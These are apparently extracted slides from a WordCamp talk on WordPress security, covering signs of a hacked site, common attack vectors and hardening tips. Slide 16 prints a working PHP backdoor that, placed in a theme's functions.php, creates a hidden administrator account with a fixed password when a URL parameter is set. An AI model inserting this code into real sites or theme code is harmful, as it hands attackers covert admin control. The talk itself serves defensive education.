RFStudio's Co-Founder Max (Hassan) Raza delivered a detailed session with demonstrations around WordPress security and shared experiences with WordCamp community about security and how to make WordPress more secure together.
7. • Permalinks structure changed (Auto)
• .htaccess results in 301 Redirection to Random Sites
• Spurious Redirections from your Home Page
• Weird Content and Banner Ads on Your Site
• Google Site View Shows Irrelevant Links
• Unusual Admin Users
• Weird DB Tables
Hacked?
Probably Yes If:
12. Vulnerable Third Party Components are
Primary Attack Vector.
You are easily Hack-able if:
1- You are using Nulled Themes
2- You have Vulnerable Plugins in Use
3- You have Outdated Themes/Plugins
16. <?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('backdooradmin')) {
$user_id = wp_create_user('backdooradmin',
'Pa55W0rd');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
PHP Backdoor
Inject a small piece of
code to theme’s
function.php
You have full wp access!
17. Hackers Guide
Keep WordPress Updated
Use Strong Passwords & Permissions
Install Backup Solution
Try Hacking your Own Site!
19. Top Plugins to Make Security Easy
1- WordFence
2- Securi Security
3- iThemes Security
20. WordPress Security Experts
Bug Bounty Program Since 2016
https://hackerone.com/wordpress
Follow Best Practices Listed by Experts here
https://wordpress.org/about/security/